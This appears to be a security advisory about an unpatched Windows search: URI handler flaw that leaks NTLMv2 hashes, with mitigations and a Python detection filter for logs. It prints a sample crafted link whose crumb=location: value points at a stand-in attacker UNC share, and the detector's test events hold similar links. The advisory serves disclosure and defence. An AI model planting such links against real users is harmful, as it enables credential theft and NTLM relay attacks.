Last updated: July 5, 2026 at 9:01 AM UTC
Tag: ntlm (1 article)

Unpatched Windows search: URI handler leaks NTLMv2 hashes via crafted crumb=location UNC path - same class as patched Snipping Tool flaw

Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829 (the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April) and achieves the same end through a search:query link whose crumb=location: parameter points at an attacker-controlled UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply Huntress mitigations.

Check
Hunt for processes launching search: URIs with crumb=location pointing at UNC paths. Monitor outbound SMB (TCP 445) to external hosts. Educate users against approving search: link prompts.
Affected
Windows systems with the unpatched search: URI handler. A crafted link in a web page or email, once approved, forces an SMB connection that discloses the user's Net-NTLMv2 hash.
Fix
Block outbound SMB (TCP 445 and 139) at the perimeter. Enforce SMB signing and NTLM relay protections. Apply Huntress mitigations and disable the search: handler where feasible pending a patch.
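The hunt described under Check can be expressed as a small log filter. This is an added example, not Huntress's or Microsoft's detection logic; the function names and the sample events are constructed for illustration, and it assumes the URI appears in a command-line or URL field of whatever telemetry is being searched.

```python
import re
from urllib.parse import unquote

# A search: URI inside a command line or URL field (not "research:" etc.).
SEARCH_URI = re.compile(r"""(?<![A-Za-z0-9-])search:[^\s"']+""", re.IGNORECASE)
# UNC path: two slashes or backslashes, a host, then a share name.
UNC = re.compile(r'^[\\/]{2}([^\\/]+)[\\/]+[^\\/]+')

def unc_hosts_in_search_uri(text):
    """Return hosts named by crumb=location:<UNC path> in any search: URI in text."""
    hosts = []
    for match in SEARCH_URI.finditer(text):
        # Decode twice so double-encoded links (%255C -> %5C -> \) are caught.
        uri = unquote(unquote(match.group(0)))
        params = uri.split(":", 1)[1]
        for param in params.split("&"):
            key, _, value = param.partition("=")
            if key.strip().lower() != "crumb":
                continue
            kind, _, target = value.partition(":")
            if kind.strip().lower() != "location":
                continue
            unc = UNC.match(target.strip())
            if unc:
                hosts.append(unc.group(1).lower())
    return hosts

def hunt(events):
    """Return (line_number, host) for every event that references a UNC location."""
    return [(n, host)
            for n, line in enumerate(events, start=1)
            for host in unc_hosts_in_search_uri(line)]

# Constructed sample events; hosts use documentation-reserved names and addresses.
SAMPLE_EVENTS = [
    r'uri=search:query=test&crumb=location:\\smb.example.net\share',
    'uri=search:query=invoice&crumb=location:%5C%5C198.51.100.7%5Cdocs',
    r'uri=search:query=report&crumb=location:C:\Users\Public',
    'uri=search:query=report',
]

if __name__ == "__main__":
    for line_no, host in hunt(SAMPLE_EVENTS):
        print(f"event {line_no}: search: URI points at UNC host {host}")
```

Hosts returned by the filter can then be compared against outbound TCP 445 connection logs to confirm whether an SMB connection actually left the network.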